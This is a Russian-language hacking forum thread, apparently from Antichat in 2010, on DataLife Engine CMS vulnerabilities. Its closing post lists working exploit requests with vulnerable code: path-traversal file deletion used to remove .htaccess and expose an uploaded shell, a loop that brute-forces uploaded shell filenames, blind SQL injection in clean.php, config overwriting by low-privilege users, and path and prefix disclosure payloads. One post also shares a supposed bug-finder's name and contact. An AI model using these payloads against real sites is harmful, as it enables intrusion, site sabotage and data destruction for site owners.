[ Обзор уязвимостей DataLife Engine ]

Запомнить меня

Привязать к IP

Нет аккаунта? Регистрация

09.06.2010, 01:43

killerman

Новичок

Регистрация: 08.06.2010

Сообщений: 1

С нами: 8382316

Репутация: 0

Цитата:

Сообщение от Quicky

Да вот действительно тема: http://dle-news.ru/bags/v85/1040-nedostatochnaya-filtraciya-vxodyashhix-dannyx.html только не как не могу в ней разобраться ...

А что в ней разбератся если у тебя на сайте есть аккаунт административный то ты можешь загрузить фейк! а дальше объяснять не надо

𝕏 Twitter Reddit Telegram Копировать ссылку

14.06.2010, 00:15

korp

Новичок

Регистрация: 26.09.2008

Сообщений: 29

С нами: 9275143

Репутация: 11

Цитата:

Найдена очередная Серьёзная уязвимость всех версий (независимо от автора).
Уровень риска: Критическая
баг позволяет выполнять любые действия в том числе sql запросы.
'key'=>"УНИК КОД"
Баг работает во всех версиях.

Вроде есть 1 файл в котором нет проверки на группу пользователя, только проверка хеша.
Кто что знает? Я порылся что-то нашёл, на этом и закончил.

14.06.2010, 00:21

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

С нами: 9510146

Репутация: 1550

Цитата:

Сообщение от korp

Откуда цитата? Прчему здесь key из конфига?
непонетно

\\все, ншел - http://dle.in.ua/bags/9503-seryoznaya-uyazvimost-v-null-versiyax.html

\\кажется, знаю, откуда урки растут у бага

Последний раз редактировалось wildshaman; 14.06.2010 в 00:28..

14.06.2010, 07:03

WP_

Новичок

Регистрация: 28.09.2008

Сообщений: 10

С нами: 9273183

Репутация: 1

Багу нашел: Lion__
Связь: 9287[шесть]78
Зовут его если не ошибаюсь Андрей

Последний раз редактировалось WP_; 14.06.2010 в 07:05..

14.06.2010, 13:07

slva2000

Новичок

Регистрация: 20.11.2009

Сообщений: 17

С нами: 8670841

Репутация: -4

wildshaman
что то я не понял пока... если лицуха (т.е. кей есть в конфиге) то уязвимости нет....?

14.06.2010, 15:15

WP_

Новичок

Регистрация: 28.09.2008

Сообщений: 10

С нами: 9273183

Репутация: 1

Цитата:

Сообщение от slva2000

что то я не понял пока... если лицуха (т.е. кей есть в конфиге) то уязвимости нет....?

наоборот !
нужно поменять на свой key

14.06.2010, 15:25

slva2000

Новичок

Регистрация: 20.11.2009

Сообщений: 17

С нами: 8670841

Репутация: -4

Цитата:

Сообщение от WP_

наоборот !
нужно поменять на свой key

но тогда - wrong key....

14.06.2010, 23:17

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

С нами: 9510146

Репутация: 1550

Ну и да, в результате ночи копания накопал:
Уязвимости нету.
ПО мнению автора, $config['key'] мог помочь сгенерировать $dle_login_hash и заюзать xsrf или просто оойти проверку.
Только он вот не учел, что для генерации хеша нужен еще и сам пасс админа.
Так что отбой, баги нет

//Развели тут блин...

Последний раз редактировалось Ctacok; 15.06.2010 в 07:43..

15.06.2010, 07:38

slva2000

Новичок

Регистрация: 20.11.2009

Сообщений: 17

С нами: 8670841

Репутация: -4

Цитата:

Сообщение от wildshaman

могу добавить, что перед проверкой ХЭШа стоит проверка админ ли...:

if (( $member_id['user_group'] != 1 )) { die ("error"); }

Ничего не выйдет.... Хотя, инфа к размышлению не плохая.

всё это в clean.php

#10

15.06.2010, 12:36

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

С нами: 9510146

Репутация: 1550

Версия ДЛЕ: 8.5 (скорее всего, и преыдущие, но тестил именно на 8.5)

Везде далее:
1){ВАШ ЮЗЕР ХЕШ} - уникальный хеш, который вы получаете при входе в дадминку. Как правило, при переходе по страницам админки он передается гетом в урле, там его и берите. Или же заходите на страницу настроек, к примеру, и ищите в коде user_hash - там он и будет
2)лишние куски кода удалены, оставлены только самые важные, играющие роль при уязвимости.

---------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------

Описание: Удаление произвольных файлов
Зависимость: Нужны админские права
Файл: /engine/inc/files.php
Кусок кода:

PHP код:


		
			
if( $action == "doimagedelete" ) {

    foreach ( $_POST['images'] as $image ) {

        @unlink( $config_path_image_upload . $image );

        @unlink( $config_path_image_upload . "thumbs/" . $image );

    }

}

Как осуществить:
Залогинившись админом, послать post запрос:
http://site.com/admin.php?mod=files

images%5Bboxsmall.jpg%5D=../uploads/files/.htaccess&action=doimagedelete&userdir=&user_hash= {ВАШ ЮЗЕР ХЕШ}

Смысл:
1) Можно удалить .htaccess из папки uploads, загрузить туда шелл и видеть его из веба

2) Можно помешать работе сайта, удалив важыне файлы.

---------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------

Описание: раскрытие префикса БД.
Зависимость: Права журналиста или администратора (любой доступ в админку)
Файл: /engine/inc/files.php
Кусок кода:

PHP код:


		
			
$serverfile = trim( htmlspecialchars( strip_tags( $_POST['serverfile'] ) ) );

$image_name = $serverfile;

if( $config['files_allow'] == "yes" and $user_group[$member_id['user_group']]['allow_file_upload'] and $_REQUEST['action'] == "quick" and (in_array( strtolower( $type ), $allowed_files ) or $serverfile != '') )

$db->query( "INSERT INTO " . PREFIX . "_files (news_id, name, onserver, author, date) values ('$news_id', '$image_name', '{$file_prefix}{$image_name}', '$author', '$added_time')" );

Как осуществить:
Залогинившись админом, послать post запрос:
http://hackhack/admin.php?mod=files&action=quick&subaction=upload

images_number=1&serverfile=\

---------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------

Описание: Получение названия загруженного файла (шелла, к примеру) через форму заливки
Зависимость: Права админа или журналиста с разрешением аливать файлы чреез админку
Файл: /admin.php?mod=files
Кусок кода:

PHP код:


		
			
$file_prefix = time() + rand( 1, 100 );

$file_prefix .= "_";

@copy( $imageurl, ROOT_DIR . "/uploads/files/" . $file_prefix . $image_name )

Ага, пишется: unixtime+{случайное число от 1 до 100}_названиефайлачтомывыгр� �зили

Отсылаем файл, снифаем, что вернул сервер:
Date: Mon, 14 Jun 2010 07:35:04 GMT

делаем себе

PHP код:


		
			
for($i=0; $i<=100; $i++)

{

    $name=strtotime("Mon, 14 Jun 2010 07:35:04 GMT")+$i;

    echo $name."<br>";

}

Генерируем все возможные нвазвания нашего файла, потом просто перебираем их.

---------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------

Описание: Blind-sql
Зависимость: magic_quotes_gpc = off и админские права
Файл: /engine/ajax/clean.php
Кусок кода:

PHP код:


		
			
if ($_REQUEST['step'] == 2) {

    if ((@strtotime($_REQUEST['date']) === -1) OR (trim($_REQUEST['date']) == ""))

        $_REQUEST['step'] = 1;

    else {

        $_REQUEST['step'] = 3;

        $sql = $db->query("SELECT id FROM " . PREFIX . "_post WHERE date < '{$_REQUEST['date']}'");

        while($row = $db->get_row($sql)){

            $db->query("DELETE FROM " . PREFIX . "_comments WHERE post_id='{$row['id']}'");

Как осуществить:
http://site.com/engine/ajax/clean.php?date=1'&user_hash={ВАШ ЮЗЕР ХЕШ}&step=2

P.S. Обыная скуля с юнионом не пройдет, так как полученная инфа сразу уходит в DELETE

Кому надо - тот докрутит

---------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------

Версии ДЛЕ ДО 8.5
Описание: редактирование настроек системы, имея лишь ограниченный (модерский) доступ в админку
Зависимость: Доступ в админку хотя бы с правами журналиста
Файл: /engine/inc/options.php
Кусок кода:

PHP код:


		
			
elseif( $action == "dosavesyscon" ) {

    $save_con = $_POST['save_con'];

    $save_con['offline_reason'] = $parse->process( stripslashes( trim( $save_con['offline_reason'] ) ) );

    $save_con['offline_reason'] = str_replace( '"', '&quot;', $parse->BB_Parse( $save_con['offline_reason'], false ) );

    

    $find[] = "'\r'";    $replace[] = "";    $find[] = "'\n'";    $replace[] = "";

    $handler = fopen( ENGINE_DIR . '/data/config.php', "w" );

    

    fwrite( $handler, "<?PHP \n\n//System Configurations\n\n\$config = array (\n\n" );

    foreach ( $save_con as $name => $value ) {

        if( $name != "offline_reason" ) {

            $value = trim( stripslashes( $value ) );

            $value = htmlspecialchars( $value);

            $value = preg_replace( $find, $replace, $value );

            

            $name = trim( stripslashes( $name ) );

            $name = htmlspecialchars( $name, ENT_QUOTES );

            $name = preg_replace( $find, $replace, $name );

        }



        fwrite( $handler, "'{$name}' => \"{$value}\",\n\n" );

    

    }

    fwrite( $handler, ");\n\n?>" );

    fclose( $handler );

}

Как осуществить:
Авторизовавшись в админке, делаем POST запрос
http://site.com/admin.php?mod=options&action=syscon
save_con%5Bhome_title%5D=GREAT HACK HOHOHOH&mod=options&action=dosavesyscon&user_hash= {ВАШ ЮЗЕР ХЕШ}

причем настроек поменять можно множество вплоть до оотключения сайта

---------------------------------------------------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------------------------------------------

Описание: раскрытие путей
1) Требуется админка
http://site.com/admin.php?mod=static&search_field[]=

2) Админка не требуется, праа Юзерские

http://site.com/?do=addnews
POST
tags[]=1&mod=addnews

http://site.com/index.php
POST
login=submit&login_password[]=1

---------------------------------------------------------------------------------------------------------------------------------------------------
(c) wildshaman 2010. Special for Antichat